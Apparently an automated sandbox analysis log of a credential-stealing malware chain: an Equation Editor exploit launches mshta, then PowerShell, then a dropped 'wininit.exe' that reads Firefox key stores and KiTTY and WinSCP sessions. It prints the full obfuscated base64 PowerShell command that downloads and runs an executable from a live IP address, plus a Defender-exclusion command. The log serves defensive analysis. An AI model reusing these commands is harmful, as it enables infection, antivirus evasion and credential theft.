                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 3E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 56B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 66B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 67E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 77E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5469Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 908Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1993Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4005Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2689Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3560Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.dllJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3296Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exe TID: 3472Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3612Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep count: 1993 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636Thread sleep count: 4005 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 3880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep count: 2689 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep count: 3560 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 3936Thread sleep time: -1080000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,15_2_00403D74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 60000
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-652
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035405C8 mov edx, dword ptr fs:[00000030h]2_2_035405C8
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_0040317B mov eax, dword ptr fs:[00000030h]15_2_0040317B
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_00402B7C GetProcessHeap,RtlAllocateHeap,15_2_00402B7C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory written: C:\Users\user\AppData\Roaming\wininit.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4vzopkvk\4vzopkvk.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4441.tmp" "c:\Users\user\AppData\Local\Temp\4vzopkvk\CSC2CE1E80E8DFB46C4BC398124C902BE0.TMP"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]0x22+'jgozckggicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicagyurelxr5ueugicagicagicagicagicagicagicagicagicagicagicattuvtymvyzgvgsw5pvelptiagicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1ukxnb04urgxsiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagte9etwxjwuzirixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbltyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbmcmqsdwludcagicagicagicagicagicagicagicagicagicagicagigtdtxyssw50uhryicagicagicagicagicagicagicagicagicagicagicagc0t3afnvz0zkktsnicagicagicagicagicagicagicagicagicagicagicaglw5htuugicagicagicagicagicagicagicagicagicagicagicaiuetkbwrxiiagicagicagicagicagicagicagicagicagicagicagic1oyw1lu3bhy2ugicagicagicagicagicagicagicagicagicagicagicbmwvbocgzavmggicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicagjgozckg6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly82ni42my4xodcumjmxlzmzl2nhc3bvbc5leguilcikru52okfquerbvefcd2luaw5pdc5leguildasmck7u1rbulqtu2xfrvaomyk7auv4icagicagicagicagicagicagicagicagicagicagicagiirftny6qvbqrefuqvx3aw5pbml0lmv4zsi='+[char]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\wininit.exe VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 15_2_00406069 GetUserNameW,15_2_00406069
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 13.2.wininit.exe.3a0edc0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 13.2.wininit.exe.3a28de0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.wininit.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 15.2.wininit.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.392918350.00000000028DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.393313668.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.626754842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.393313668.0000000003881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 3868, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: wininit.exe PID: 3932, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 0000000F.00000002.626819523.0000000000524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\AppData\Roaming\wininit.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
